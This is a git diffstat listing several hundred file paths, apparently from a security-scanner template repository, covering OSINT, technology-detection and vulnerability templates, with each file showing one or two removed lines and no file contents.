http/osint/gnome-extensions.yaml | 2 -- http/osint/gpoddernet.yaml | 2 -- http/osint/grandprof.yaml | 2 -- http/osint/graphicssocial-mastodon-instance.yaml | 2 -- http/osint/gravatar.yaml | 2 -- http/osint/gumroad.yaml | 2 -- http/osint/hackaday.yaml | 2 -- http/osint/hacker-news.yaml | 2 -- http/osint/hackerearth.yaml | 2 -- http/osint/hackernoon.yaml | 2 -- http/osint/hackerone.yaml | 2 -- http/osint/hackerrank.yaml | 2 -- http/osint/hackster.yaml | 2 -- http/osint/hamaha.yaml | 2 -- http/osint/hanime.yaml | 2 -- http/osint/hcommonssocial-mastodon-instance.yaml | 2 -- http/osint/heylink.yaml | 2 -- http/osint/hiberworld.yaml | 2 -- http/osint/hihello.yaml | 2 -- http/osint/historianssocial-mastodon-instance.yaml | 2 -- http/osint/homedesign3d.yaml | 2 -- http/osint/hometechsocial-mastodon-instance.yaml | 2 -- http/osint/hoobe.yaml | 2 -- http/osint/hostuxsocial-mastodon-instance.yaml | 2 -- http/osint/houzz.yaml | 2 -- http/osint/hubpages.yaml | 2 -- http/osint/hubski.yaml | 2 -- http/osint/hugging-face.yaml | 2 -- http/osint/iconfinder.yaml | 2 -- http/osint/icq-chat.yaml | 2 -- http/osint/ifttt.yaml | 2 -- http/osint/ifunny.yaml | 2 -- http/osint/igromania.yaml | 2 -- http/osint/ilovegrowingmarijuana.yaml | 2 -- http/osint/imagefap.yaml | 2 -- http/osint/imageshack.yaml | 2 -- http/osint/imgsrcru.yaml | 2 -- http/osint/imgur.yaml | 2 -- http/osint/inaturalist.yaml | 2 -- http/osint/independent-academia.yaml | 2 -- http/osint/inkbunny.yaml | 2 -- http/osint/insanejournal.yaml | 2 -- http/osint/instagram.yaml | 2 -- http/osint/instructables.yaml | 2 -- http/osint/internet-archive-account.yaml | 2 -- http/osint/internet-archive-user-search.yaml | 2 -- http/osint/interpals.yaml | 2 -- http/osint/ismygirl.yaml | 2 -- http/osint/issuu.yaml | 2 -- http/osint/itchio.yaml | 2 -- http/osint/japandict.yaml | 2 -- http/osint/jbzd.yaml | 2 -- http/osint/jejapl.yaml | 2 -- http/osint/jeuxvideo.yaml | 2 -- http/osint/joe-monster.yaml | 2 -- http/osint/jsfiddle.yaml | 2 -- http/osint/justforfans.yaml | 2 -- http/osint/kaggle.yaml | 2 -- http/osint/karabin.yaml | 2 -- http/osint/keybase.yaml | 2 -- http/osint/kickstarter.yaml | 2 -- http/osint/kik.yaml | 2 -- http/osint/kipin.yaml | 2 -- http/osint/knowyourmeme.yaml | 2 -- http/osint/ko-fi.yaml | 2 -- http/osint/kongregate.yaml | 2 -- http/osint/kotburger.yaml | 2 -- http/osint/kwejkpl.yaml | 2 -- http/osint/librarything.yaml | 2 -- http/osint/libretoothgr-mastodon-instance.yaml | 2 -- http/osint/lichess.yaml | 2 -- http/osint/likeevideo.yaml | 2 -- http/osint/line.yaml | 2 -- http/osint/linktree.yaml | 2 -- http/osint/linuxorgru.yaml | 2 -- http/osint/litmindclub-mastodon-instance.yaml | 2 -- http/osint/livejournal.yaml | 2 -- http/osint/livemasterru.yaml | 2 -- http/osint/lobsters.yaml | 2 -- http/osint/lorsh-mastodon-instance.yaml | 2 -- http/osint/love-ru.yaml | 2 -- http/osint/lowcygierpl.yaml | 2 -- http/osint/maga-chat.yaml | 2 -- http/osint/magabook.yaml | 2 -- http/osint/magix.yaml | 2 -- http/osint/manyvids.yaml | 2 -- http/osint/mapmytracks.yaml | 2 -- http/osint/mapstodonspace-mastodon-instance.yaml | 2 -- http/osint/maroc-nl.yaml | 2 -- http/osint/marshmallow.yaml | 2 -- http/osint/martech.yaml | 2 -- http/osint/massage-anywhere.yaml | 2 -- http/osint/mastoai.yaml | 2 -- http/osint/mastodon-101010pl.yaml | 2 -- http/osint/mastodon-api.yaml | 2 -- http/osint/mastodon-chaossocial.yaml | 2 -- http/osint/mastodon-climatejusticerocks.yaml | 2 -- http/osint/mastodon-countersocial.yaml | 2 -- http/osint/mastodon-defcon.yaml | 2 -- http/osint/mastodon-eu-voice.yaml | 2 -- http/osint/mastodon-mastodon.yaml | 2 -- http/osint/mastodon-meowsocial.yaml | 2 -- http/osint/mastodon-mstdnio.yaml | 2 -- http/osint/mastodon-polsocial.yaml | 2 -- http/osint/mastodon-rigczclub.yaml | 2 -- http/osint/mastodon-social-tchncs.yaml | 2 -- http/osint/mastodon-tflnetpl.yaml | 2 -- http/osint/mastodon-tootcommunity.yaml | 2 -- http/osint/mastodonbooksnet-mastodon-instance.yaml | 2 -- http/osint/mastodonchasedemdev-mastodon-instance.yaml | 2 -- http/osint/mastodononline.yaml | 2 -- http/osint/mastonyc-mastodon-instance.yaml | 2 -- http/osint/mastown-mastodon-instance.yaml | 2 -- http/osint/mcname-minecraft.yaml | 2 -- http/osint/mcuuid-minecraft.yaml | 2 -- http/osint/mediakits.yaml | 2 -- http/osint/medium.yaml | 2 -- http/osint/medyczkapl.yaml | 2 -- http/osint/meet-me.yaml | 2 -- http/osint/megamodelspl.yaml | 2 -- http/osint/memrise.yaml | 2 -- http/osint/message-me.yaml | 2 -- http/osint/metacritic.yaml | 2 -- http/osint/microsoft-technet-community.yaml | 2 -- http/osint/minds.yaml | 2 -- http/osint/minecraft-list.yaml | 2 -- http/osint/mintme.yaml | 2 -- http/osint/mistrzowie.yaml | 2 -- http/osint/mix.yaml | 2 -- http/osint/mixi.yaml | 2 -- http/osint/mixlr.yaml | 2 -- http/osint/mmorpg.yaml | 2 -- http/osint/mod-db.yaml | 2 -- http/osint/moneysavingexpert.yaml | 2 -- http/osint/motokiller.yaml | 2 -- http/osint/moxfield.yaml | 2 -- http/osint/muck-rack.yaml | 2 -- http/osint/musiciansocial-mastodon-instance.yaml | 2 -- http/osint/musictraveler.yaml | 2 -- http/osint/my-instants.yaml | 2 -- http/osint/myanimelist.yaml | 2 -- http/osint/mybuildercom.yaml | 2 -- http/osint/myfitnesspal-author.yaml | 2 -- http/osint/myfitnesspal-community.yaml | 2 -- http/osint/mylot.yaml | 2 -- http/osint/mymfans.yaml | 2 -- http/osint/myportfolio.yaml | 2 -- http/osint/myspace.yaml | 2 -- http/osint/myspreadshop.yaml | 2 -- http/osint/naija-planet.yaml | 2 -- http/osint/nairaland.yaml | 2 -- http/osint/naturalnews.yaml | 2 -- http/osint/naver.yaml | 2 -- http/osint/netvibes.yaml | 2 -- http/osint/newgrounds.yaml | 2 -- http/osint/newmeet.yaml | 2 -- http/osint/nihbuatjajan.yaml | 2 -- http/osint/nitecrew-mastodon-instance.yaml | 2 -- http/osint/nnru.yaml | 2 -- http/osint/notabug.yaml | 2 -- http/osint/note.yaml | 2 -- http/osint/npmjs.yaml | 2 -- http/osint/oglaszamy24hpl.yaml | 2 -- http/osint/ogugg.yaml | 2 -- http/osint/okidoki.yaml | 2 -- http/osint/okru.yaml | 2 -- http/osint/olx.yaml | 2 -- http/osint/omlet.yaml | 2 -- http/osint/opencollective.yaml | 2 -- http/osint/opensource.yaml | 2 -- http/osint/openstreetmap.yaml | 2 -- http/osint/opgg.yaml | 2 -- http/osint/orbys.yaml | 2 -- http/osint/osu.yaml | 2 -- http/osint/our-freedom-book.yaml | 2 -- http/osint/owly.yaml | 2 -- http/osint/palnet.yaml | 2 -- http/osint/parler-archived-posts.yaml | 2 -- http/osint/parler-archived-profile.yaml | 2 -- http/osint/parler.yaml | 2 -- http/osint/pastebin.yaml | 2 -- http/osint/patch.yaml | 2 -- http/osint/patientslikeme.yaml | 2 -- http/osint/patreon.yaml | 2 -- http/osint/patriots-win.yaml | 2 -- http/osint/patronite.yaml | 2 -- http/osint/paypal.yaml | 2 -- http/osint/pcgamer.yaml | 2 -- http/osint/pcpartpicker.yaml | 2 -- http/osint/peing.yaml | 2 -- http/osint/periscope.yaml | 2 -- http/osint/pettingzooco-mastodon-instance.yaml | 2 -- http/osint/pewex.yaml | 2 -- http/osint/picsart.yaml | 2 -- http/osint/piekielni.yaml | 2 -- http/osint/pikabu.yaml | 2 -- http/osint/pillowfort.yaml | 2 -- http/osint/pinkbike.yaml | 2 -- http/osint/pinterest.yaml | 2 -- http/osint/pixelfedsocial.yaml | 2 -- http/osint/platzi.yaml | 2 -- http/osint/playstation-network.yaml | 2 -- http/osint/plurk.yaml | 2 -- http/osint/pokec.yaml | 2 -- http/osint/pokemonshowdown.yaml | 2 -- http/osint/pokerstrategy.yaml | 2 -- http/osint/polchatpl.yaml | 2 -- http/osint/policja2009.yaml | 2 -- http/osint/poll-everywhere.yaml | 2 -- http/osint/polygon.yaml | 2 -- http/osint/polywork.yaml | 1 - http/osint/popl.yaml | 2 -- http/osint/pornhub-porn-stars.yaml | 2 -- http/osint/pornhub-users.yaml | 2 -- http/osint/poshmark.yaml | 2 -- http/osint/postcrossing.yaml | 2 -- http/osint/postnews.yaml | 1 - http/osint/poweredbygaysocial-mastodon-instance.yaml | 2 -- http/osint/producthunt.yaml | 2 -- http/osint/promodj.yaml | 2 -- http/osint/pronounspage.yaml | 2 -- http/osint/pronouny.yaml | 2 -- http/osint/prose.yaml | 2 -- http/osint/prvpl.yaml | 2 -- http/osint/psstaudio.yaml | 2 -- http/osint/public.yaml | 2 -- http/osint/pypi.yaml | 2 -- http/osint/queer.yaml | 2 -- http/osint/quitterpl.yaml | 2 -- http/osint/quora.yaml | 2 -- http/osint/raddleme.yaml | 2 -- http/osint/rantli.yaml | 2 -- http/osint/reblogme.yaml | 2 -- http/osint/redbubble.yaml | 2 -- http/osint/reddit.yaml | 2 -- http/osint/redgifs.yaml | 2 -- http/osint/refsheet.yaml | 2 -- http/osint/researchgate.yaml | 2 -- http/osint/resumes-actorsaccess.yaml | 2 -- http/osint/revolut.yaml | 2 -- http/osint/riskru.yaml | 2 -- http/osint/roblox.yaml | 2 -- http/osint/rsi.yaml | 2 -- http/osint/ru-123rf.yaml | 2 -- http/osint/rumblechannel.yaml | 2 -- http/osint/rumbleuser.yaml | 2 -- http/osint/salon24.yaml | 2 -- http/osint/saracartershow.yaml | 2 -- http/osint/scoutwiki.yaml | 2 -- http/osint/scratch.yaml | 2 -- http/osint/secure-donation.yaml | 2 -- http/osint/seneporno.yaml | 2 -- http/osint/sentimente.yaml | 2 -- http/osint/seoclerks.yaml | 2 -- http/osint/setlistfm.yaml | 2 -- http/osint/sexworker.yaml | 2 -- http/osint/sfd.yaml | 2 -- http/osint/shanii-writes.yaml | 2 -- http/osint/shesfreaky.yaml | 2 -- http/osint/shopify.yaml | 2 -- http/osint/shutterstock.yaml | 2 -- http/osint/skeb.yaml | 2 -- http/osint/skillshare.yaml | 1 - http/osint/skyrock.yaml | 2 -- http/osint/slackholes.yaml | 2 -- http/osint/slant.yaml | 2 -- http/osint/slides.yaml | 2 -- http/osint/slideshare.yaml | 2 -- http/osint/smashrun.yaml | 2 -- http/osint/smelsy.yaml | 2 -- http/osint/smugmug.yaml | 2 -- http/osint/smule.yaml | 2 -- http/osint/snapchat-stories.yaml | 2 -- http/osint/snapchat.yaml | 2 -- http/osint/snipfeed.yaml | 2 -- http/osint/soccitizen4eu.yaml | 2 -- http/osint/social-msdn.yaml | 2 -- http/osint/socialbundde.yaml | 2 -- http/osint/sofurry.yaml | 2 -- http/osint/solikick.yaml | 2 -- http/osint/soloby.yaml | 2 -- http/osint/soloto.yaml | 2 -- http/osint/soundcloud.yaml | 2 -- http/osint/soup.yaml | 2 -- http/osint/sourceforge.yaml | 2 -- http/osint/speaker-deck.yaml | 2 -- http/osint/speedrun.yaml | 2 -- http/osint/spiceworks.yaml | 2 -- http/osint/sporcle.yaml | 2 -- http/osint/spotify.yaml | 2 -- http/osint/steam.yaml | 2 -- http/osint/steemit.yaml | 2 -- http/osint/steller.yaml | 2 -- http/osint/stonerssocial-mastodon-instance.yaml | 2 -- http/osint/storycorps.yaml | 2 -- http/osint/streamelements.yaml | 2 -- http/osint/streamlabs.yaml | 2 -- http/osint/stripchat.yaml | 2 -- http/osint/subscribestar.yaml | 2 -- http/osint/sukebeinyaasi.yaml | 2 -- http/osint/suzuri.yaml | 2 -- http/osint/szmerinfo.yaml | 2 -- http/osint/tabletoptournament.yaml | 2 -- http/osint/tagged.yaml | 2 -- http/osint/tamtam.yaml | 2 -- http/osint/tanukipl.yaml | 2 -- http/osint/tapitag.yaml | 2 -- http/osint/tappy.yaml | 2 -- http/osint/taringa.yaml | 2 -- http/osint/taskrabbit.yaml | 2 -- http/osint/teamtreehouse.yaml | 2 -- http/osint/teddygirls.yaml | 2 -- http/osint/teespring.yaml | 2 -- http/osint/teknik.yaml | 2 -- http/osint/telegram.yaml | 2 -- http/osint/tellonym.yaml | 2 -- http/osint/tenor.yaml | 2 -- http/osint/tf2-backpack-examiner.yaml | 2 -- http/osint/thegatewaypundit.yaml | 2 -- http/osint/theguardian.yaml | 2 -- http/osint/themeforest.yaml | 2 -- http/osint/thetattooforum.yaml | 2 -- http/osint/tiktok.yaml | 2 -- http/osint/tildezone-mastodon-instance.yaml | 2 -- http/osint/tinder.yaml | 2 -- http/osint/tmdb.yaml | 2 -- http/osint/tootingch-mastodon-instance.yaml | 2 -- http/osint/totalwar.yaml | 2 -- http/osint/toyhouse.yaml | 2 -- http/osint/trackmanialadder.yaml | 2 -- http/osint/tradingview.yaml | 2 -- http/osint/trakt.yaml | 2 -- http/osint/trello.yaml | 2 -- http/osint/tripadvisor.yaml | 2 -- http/osint/truth-social.yaml | 2 -- http/osint/tryhackme.yaml | 1 - http/osint/tumblr.yaml | 2 -- http/osint/tunefind.yaml | 2 -- http/osint/twitcasting.yaml | 2 -- http/osint/twitch.yaml | 2 -- http/osint/twitter-archived-profile.yaml | 2 -- http/osint/twitter-archived-tweets.yaml | 2 -- http/osint/twitter.yaml | 2 -- http/osint/twpro.yaml | 2 -- http/osint/ubisoft.yaml | 2 -- http/osint/udemy.yaml | 2 -- http/osint/uefconnect.yaml | 2 -- http/osint/uid.yaml | 2 -- http/osint/uiuxdevsocial-mastodon-instance.yaml | 2 -- http/osint/ultras-diary.yaml | 2 -- http/osint/ulubpl.yaml | 2 -- http/osint/unsplash.yaml | 2 -- http/osint/untappd.yaml | 2 -- http/osint/usa-life.yaml | 2 -- http/osint/utipio.yaml | 2 -- http/osint/uwuai.yaml | 2 -- http/osint/uwumarket.yaml | 2 -- http/osint/venmo.yaml | 2 -- http/osint/vero.yaml | 2 -- http/osint/vibilagare.yaml | 2 -- http/osint/viddler.yaml | 2 -- http/osint/vimeo.yaml | 2 -- http/osint/vine.yaml | 2 -- http/osint/vip-blog.yaml | 2 -- http/osint/virustotal.yaml | 2 -- http/osint/visnesscard.yaml | 2 -- http/osint/vivino.yaml | 2 -- http/osint/vk.yaml | 2 -- http/osint/vklworld-mastodon-instance.yaml | 2 -- http/osint/vmstio-mastodon-instance.yaml | 2 -- http/osint/voice123.yaml | 2 -- http/osint/voicescom.yaml | 2 -- http/osint/vsco.yaml | 2 -- http/osint/wanelo.yaml | 2 -- http/osint/warriorforum.yaml | 2 -- http/osint/watchmemorecom.yaml | 2 -- http/osint/watchmyfeed.yaml | 2 -- http/osint/wattpad.yaml | 2 -- http/osint/weasyl.yaml | 2 -- http/osint/weebly.yaml | 2 -- http/osint/wego.yaml | 2 -- http/osint/weheartit.yaml | 2 -- http/osint/weibo.yaml | 2 -- http/osint/wetransfer.yaml | 2 -- http/osint/wikidot.yaml | 2 -- http/osint/wikipedia.yaml | 2 -- http/osint/wimkin-publicprofile.yaml | 2 -- http/osint/wireclub.yaml | 2 -- http/osint/wishlistr.yaml | 2 -- http/osint/wolni-slowianie.yaml | 2 -- http/osint/wordnik.yaml | 2 -- http/osint/wordpress-support.yaml | 2 -- http/osint/wordpress.yaml | 2 -- http/osint/wowhead.yaml | 2 -- http/osint/wykop.yaml | 2 -- http/osint/xanga.yaml | 2 -- http/osint/xbox-gamertag.yaml | 2 -- http/osint/xhamster.yaml | 2 -- http/osint/xing.yaml | 2 -- http/osint/xvideos-models.yaml | 2 -- http/osint/xvideos-profiles.yaml | 2 -- http/osint/yahoo-japan-auction.yaml | 2 -- http/osint/yapishu.yaml | 2 -- http/osint/yazawaj.yaml | 2 -- http/osint/yelp.yaml | 2 -- http/osint/youpic.yaml | 2 -- http/osint/youtube.yaml | 2 -- http/osint/zatrybipl.yaml | 2 -- http/osint/zbiornik.yaml | 2 -- http/osint/zhihu.yaml | 2 -- http/osint/zillow.yaml | 2 -- http/osint/zmarsacom.yaml | 2 -- http/osint/zomato.yaml | 2 -- http/osint/zoomitir.yaml | 2 -- http/technologies/apollo-server-detect.yaml | 2 -- http/technologies/catalog-creator-detect.yaml | 2 -- http/technologies/csrfguard-detect.yaml | 2 -- http/technologies/elasticsearch-sql-client-detect.yaml | 2 -- http/technologies/elfinder-detect.yaml | 2 -- http/technologies/elfinder-version.yaml | 2 -- http/technologies/fingerprinthub-web-fingerprints.yaml | 1 - http/technologies/geo-webserver-detect.yaml | 2 -- http/technologies/gnuboard-detect.yaml | 2 -- http/technologies/hp-blade-admin-detect.yaml | 2 -- http/technologies/icecast-mediaserver-detect.yaml | 2 -- http/technologies/influxdb-version-detect.yaml | 2 -- http/technologies/magento-version-detect.yaml | 2 -- http/technologies/nacos-version.yaml | 2 -- http/technologies/neos-detect.yaml | 2 -- http/technologies/netsweeper-webadmin-detect.yaml | 2 -- http/technologies/node-red-detect.yaml | 2 -- http/technologies/ntop-detect.yaml | 2 -- http/technologies/open-virtualization-manager-detect.yaml | 2 -- http/technologies/oracle/oracle-atg-commerce.yaml | 2 -- http/technologies/osquery-fleet-detect.yaml | 2 -- http/technologies/phppgadmin-version.yaml | 2 -- http/technologies/projectsend-detect.yaml | 2 -- http/technologies/secui-waf-detect.yaml | 2 -- http/technologies/snipeit-panel.yaml | 2 -- http/technologies/sonicwall-email-security-detect.yaml | 2 -- http/technologies/splash-rendering-service.yaml | 2 -- http/technologies/swag-instance-default-page.yaml | 2 -- http/technologies/synology-web-station.yaml | 2 -- http/technologies/telerik/telerik-dialoghandler-detect.yaml | 2 -- http/technologies/telerik/telerik-fileupload-detect.yaml | 2 -- http/technologies/teradici-pcoip.yaml | 2 -- http/technologies/thinkcmf-detect.yaml | 2 -- http/technologies/thinkphp-detect.yaml | 2 -- http/technologies/tileserver-gl.yaml | 2 -- http/technologies/tornado-server-login.yaml | 2 -- http/technologies/vmware/vmware-site-recovery-manager.yaml | 2 -- http/technologies/waf-detect.yaml | 2 -- http/technologies/wuzhicms-detect.yaml | 2 -- http/technologies/yeswiki-detect.yaml | 2 -- http/token-spray/api-blockchain.yaml | 2 -- http/token-spray/api-vercel.yaml | 2 -- http/vulnerabilities/apache/apache-flink-unauth-rce.yaml | 2 -- http/vulnerabilities/apache/apache-ofbiz-log4j-rce.yaml | 2 -- http/vulnerabilities/apache/apache-solr-file-read.yaml | 2 -- http/vulnerabilities/apache/log4j/jamf-pro-log4j-rce.yaml | 2 -- http/vulnerabilities/avaya/avaya-aura-xss.yaml | 2 -- http/vulnerabilities/backdoor/jexboss-backdoor.yaml | 2 -- .../cisco/cisco-cloudcenter-suite-log4j-rce.yaml | 2 -- .../cisco/cisco-unified-communications-log4j.yaml | 2 -- http/vulnerabilities/cisco/cisco-vmanage-log4j.yaml | 2 -- http/vulnerabilities/code42/code42-log4j-rce.yaml | 2 -- http/vulnerabilities/concrete/concrete-xss.yaml | 2 -- .../vulnerabilities/confluence/confluence-ssrf-sharelinks.yaml | 2 -- http/vulnerabilities/dedecms/dedecms-config-xss.yaml | 2 -- http/vulnerabilities/dedecms/dedecms-membergroup-sqli.yaml | 2 -- http/vulnerabilities/dedecms/dedecms-openredirect.yaml | 2 -- http/vulnerabilities/dedecms/dedecms-rce.yaml | 2 -- http/vulnerabilities/deos-open500-admin.yaml | 2 -- http/vulnerabilities/drupal/drupal-avatar-xss.yaml | 2 -- http/vulnerabilities/fastjson/fastjson-1-2-24-rce.yaml | 2 -- http/vulnerabilities/fastjson/fastjson-1-2-41-rce.yaml | 2 -- http/vulnerabilities/fastjson/fastjson-1-2-42-rce.yaml | 2 -- http/vulnerabilities/fastjson/fastjson-1-2-43-rce.yaml | 2 -- http/vulnerabilities/fastjson/fastjson-1-2-47-rce.yaml | 2 -- http/vulnerabilities/fastjson/fastjson-1-2-62-rce.yaml | 2 -- http/vulnerabilities/fastjson/fastjson-1-2-67-rce.yaml | 2 -- http/vulnerabilities/fastjson/fastjson-1-2-68-rce.yaml | 2 -- http/vulnerabilities/froxlor-xss.yaml | 2 -- http/vulnerabilities/generic/basic-xss-prober.yaml | 2 -- http/vulnerabilities/generic/crlf-injection.yaml | 2 -- http/vulnerabilities/generic/error-based-sql-injection.yaml | 2 -- http/vulnerabilities/generic/generic-j2ee-lfi.yaml | 2 -- http/vulnerabilities/generic/generic-linux-lfi.yaml | 2 -- http/vulnerabilities/generic/generic-windows-lfi.yaml | 2 -- http/vulnerabilities/generic/top-xss-params.yaml | 2 -- http/vulnerabilities/gitlab/gitlab-rce.yaml | 2 -- http/vulnerabilities/gnuboard/gnuboard-sms-xss.yaml | 2 -- http/vulnerabilities/gnuboard/gnuboard5-rxss.yaml | 2 -- http/vulnerabilities/gnuboard/gnuboard5-xss.yaml | 2 -- http/vulnerabilities/httpbin/httpbin-open-redirect.yaml | 2 -- http/vulnerabilities/httpbin/httpbin-xss.yaml | 2 -- http/vulnerabilities/huawei/huawei-hg255s-lfi.yaml | 2 -- http/vulnerabilities/ibm/eclipse-help-system-xss.yaml | 2 -- http/vulnerabilities/ibm/ibm-infoprint-lfi.yaml | 2 -- http/vulnerabilities/j2ee/liferay-resource-leak.yaml | 2 -- http/vulnerabilities/jamf/jamf-log4j-jndi-rce.yaml | 2 -- http/vulnerabilities/joomla/joomla-jvehicles-lfi.yaml | 2 -- http/vulnerabilities/joomla/rusty-joomla.yaml | 2 -- http/vulnerabilities/laravel/laravel-ignition-xss.yaml | 2 -- http/vulnerabilities/metersphere/metersphere-plugin-rce.yaml | 2 -- http/vulnerabilities/mobileiron/mobileiron-log4j-jndi-rce.yaml | 2 -- http/vulnerabilities/moodle/moodle-filter-jmol-lfi.yaml | 2 -- http/vulnerabilities/moodle/moodle-filter-jmol-xss.yaml | 2 -- http/vulnerabilities/moodle/moodle-xss.yaml | 2 -- http/vulnerabilities/netsweeper/netsweeper-open-redirect.yaml | 2 -- http/vulnerabilities/netsweeper/netsweeper-rxss.yaml | 2 -- http/vulnerabilities/opencpu/opencpu-rce.yaml | 2 -- .../oracle/oracle-ebs-bispgraph-file-access.yaml | 2 -- http/vulnerabilities/oracle/oracle-ebs-xss.yaml | 2 -- http/vulnerabilities/oracle/oracle-siebel-xss.yaml | 2 -- http/vulnerabilities/oscommerce/oscommerce-rce.yaml | 2 -- http/vulnerabilities/other/3cx-management-console.yaml | 2 -- http/vulnerabilities/other/74cms-sqli.yaml | 2 -- http/vulnerabilities/other/WSO2-2019-0598.yaml | 2 -- http/vulnerabilities/other/academy-lms-xss.yaml | 2 -- http/vulnerabilities/other/accent-microcomputers-lfi.yaml | 2 -- http/vulnerabilities/other/acme-xss.yaml | 2 -- http/vulnerabilities/other/aerocms-sqli.yaml | 2 -- http/vulnerabilities/other/alumni-management-sqli.yaml | 2 -- http/vulnerabilities/other/antsword-backdoor.yaml | 2 -- http/vulnerabilities/other/asanhamayesh-lfi.yaml | 2 -- http/vulnerabilities/other/aspnuke-openredirect.yaml | 2 -- http/vulnerabilities/other/avada-xss.yaml | 2 -- http/vulnerabilities/other/bems-api-lfi.yaml | 2 -- http/vulnerabilities/other/beward-ipcamera-disclosure.yaml | 2 -- http/vulnerabilities/other/bitrix-open-redirect.yaml | 2 -- http/vulnerabilities/other/blue-ocean-excellence-lfi.yaml | 2 -- http/vulnerabilities/other/bullwark-momentum-lfi.yaml | 2 -- http/vulnerabilities/other/carel-bacnet-gateway-traversal.yaml | 2 -- http/vulnerabilities/other/carrental-xss.yaml | 2 -- http/vulnerabilities/other/caucho-resin-info-disclosure.yaml | 2 -- http/vulnerabilities/other/chamilo-lms-sqli.yaml | 2 -- http/vulnerabilities/other/chamilo-lms-xss.yaml | 2 -- http/vulnerabilities/other/ckan-dom-based-xss.yaml | 2 -- http/vulnerabilities/other/coldfusion-debug-xss.yaml | 2 -- http/vulnerabilities/other/commax-biometric-auth-bypass.yaml | 1 - http/vulnerabilities/other/commax-credentials-disclosure.yaml | 2 -- http/vulnerabilities/other/comtrend-password-exposure.yaml | 2 -- http/vulnerabilities/other/core-chuangtian-cloud-rce.yaml | 2 -- http/vulnerabilities/other/couchdb-adminparty.yaml | 2 -- http/vulnerabilities/other/crystal-live-server-lfi.yaml | 2 -- http/vulnerabilities/other/cs-cart-unauthenticated-lfi.yaml | 2 -- http/vulnerabilities/other/cvms-sqli.yaml | 2 -- http/vulnerabilities/other/dicoogle-pacs-lfi.yaml | 2 -- http/vulnerabilities/other/digitalrebar-traversal.yaml | 2 -- http/vulnerabilities/other/discourse-xss.yaml | 2 -- http/vulnerabilities/other/dixell-xweb500-filewrite.yaml | 2 -- http/vulnerabilities/other/dotnetcms-sqli.yaml | 2 -- http/vulnerabilities/other/dss-download-fileread.yaml | 2 -- http/vulnerabilities/other/duomicms-sql-injection.yaml | 2 -- http/vulnerabilities/other/dzzoffice-xss.yaml | 2 -- http/vulnerabilities/other/ecshop-sqli.yaml | 2 -- http/vulnerabilities/other/ecsimagingpacs-rce.yaml | 2 -- http/vulnerabilities/other/eibiz-lfi.yaml | 2 -- http/vulnerabilities/other/elFinder-path-traversal.yaml | 2 -- http/vulnerabilities/other/elasticsearch5-log4j-rce.yaml | 2 -- http/vulnerabilities/other/empirecms-xss.yaml | 2 -- http/vulnerabilities/other/ems-sqli.yaml | 2 -- http/vulnerabilities/other/eris-xss.yaml | 2 -- http/vulnerabilities/other/etouch-v2-sqli.yaml | 2 -- http/vulnerabilities/other/ewebs-arbitrary-file-reading.yaml | 2 -- http/vulnerabilities/other/eyelock-nano-lfd.yaml | 2 -- http/vulnerabilities/other/fatpipe-auth-bypass.yaml | 2 -- http/vulnerabilities/other/fatpipe-backdoor.yaml | 2 -- http/vulnerabilities/other/feifeicms-lfr.yaml | 2 -- http/vulnerabilities/other/finecms-sqli.yaml | 2 -- http/vulnerabilities/other/finereport-path-traversal.yaml | 2 -- http/vulnerabilities/other/flatpress-xss.yaml | 2 -- http/vulnerabilities/other/flir-path-traversal.yaml | 2 -- http/vulnerabilities/other/geovision-geowebserver-lfi.yaml | 2 -- http/vulnerabilities/other/geovision-geowebserver-xss.yaml | 2 -- http/vulnerabilities/other/global-domains-lfi.yaml | 2 -- http/vulnerabilities/other/global-domains-xss.yaml | 2 -- http/vulnerabilities/other/goanywhere-mft-log4j-rce.yaml | 2 -- http/vulnerabilities/other/goip-1-lfi.yaml | 2 -- http/vulnerabilities/other/graylog-log4j.yaml | 2 -- http/vulnerabilities/other/groupoffice-lfi.yaml | 2 -- http/vulnerabilities/other/gsoap-lfi.yaml | 2 -- http/vulnerabilities/other/h3c-imc-rce.yaml | 2 -- http/vulnerabilities/other/hanming-lfr.yaml | 2 -- http/vulnerabilities/other/hashicorp-consul-rce.yaml | 2 -- http/vulnerabilities/other/hasura-graphql-psql-exec.yaml | 2 -- http/vulnerabilities/other/hiboss-rce.yaml | 2 -- http/vulnerabilities/other/hjtcloud-arbitrary-file-read.yaml | 2 -- .../other/hjtcloud-rest-arbitrary-file-read.yaml | 2 -- http/vulnerabilities/other/homeautomation-v3-openredirect.yaml | 2 -- http/vulnerabilities/other/hospital-management-xss.yaml | 2 -- http/vulnerabilities/other/hospital-management-xss2.yaml | 2 -- http/vulnerabilities/other/hrsale-unauthenticated-lfi.yaml | 2 -- http/vulnerabilities/other/huawei-hg659-lfi.yaml | 2 -- http/vulnerabilities/other/huawei-router-auth-bypass.yaml | 2 -- http/vulnerabilities/other/huijietong-cloud-fileread.yaml | 2 -- http/vulnerabilities/other/icewarp-open-redirect.yaml | 2 -- http/vulnerabilities/other/icewarp-webclient-rce.yaml | 2 -- http/vulnerabilities/other/inspur-clusterengine-rce.yaml | 2 -- http/vulnerabilities/other/interlib-fileread.yaml | 2 -- http/vulnerabilities/other/java-melody-xss.yaml | 2 -- http/vulnerabilities/other/jeewms-lfi.yaml | 2 -- http/vulnerabilities/other/jinfornet-jreport-lfi.yaml | 2 -- http/vulnerabilities/other/joomla-com-fabrik-lfi.yaml | 2 -- http/vulnerabilities/other/kafdrop-xss.yaml | 2 -- http/vulnerabilities/other/karel-ip-phone-lfi.yaml | 2 -- http/vulnerabilities/other/kavita-lfi.yaml | 2 -- http/vulnerabilities/other/kevinlab-bems-backdoor.yaml | 2 -- http/vulnerabilities/other/kevinlab-bems-sqli.yaml | 2 -- http/vulnerabilities/other/kevinlab-hems-backdoor.yaml | 2 -- http/vulnerabilities/other/keycloak-xss.yaml | 2 -- .../vulnerabilities/other/kingdee-eas-directory-traversal.yaml | 2 -- http/vulnerabilities/other/kingsoft-v8-file-read.yaml | 2 -- http/vulnerabilities/other/kyocera-m2035dn-lfi.yaml | 2 -- http/vulnerabilities/other/laravel-filemanager-lfi.yaml | 2 -- http/vulnerabilities/other/loancms-sqli.yaml | 2 -- http/vulnerabilities/other/lotuscms-rce.yaml | 2 -- http/vulnerabilities/other/lucee-xss.yaml | 2 -- http/vulnerabilities/other/maccmsv10-backdoor.yaml | 2 -- http/vulnerabilities/other/magicflow-lfi.yaml | 2 -- http/vulnerabilities/other/mcafee-epo-rce.yaml | 2 -- http/vulnerabilities/other/metinfo-lfi.yaml | 2 -- http/vulnerabilities/other/microweber-xss.yaml | 2 -- http/vulnerabilities/other/mida-eframework-xss.yaml | 2 -- http/vulnerabilities/other/minimouse-lfi.yaml | 2 -- 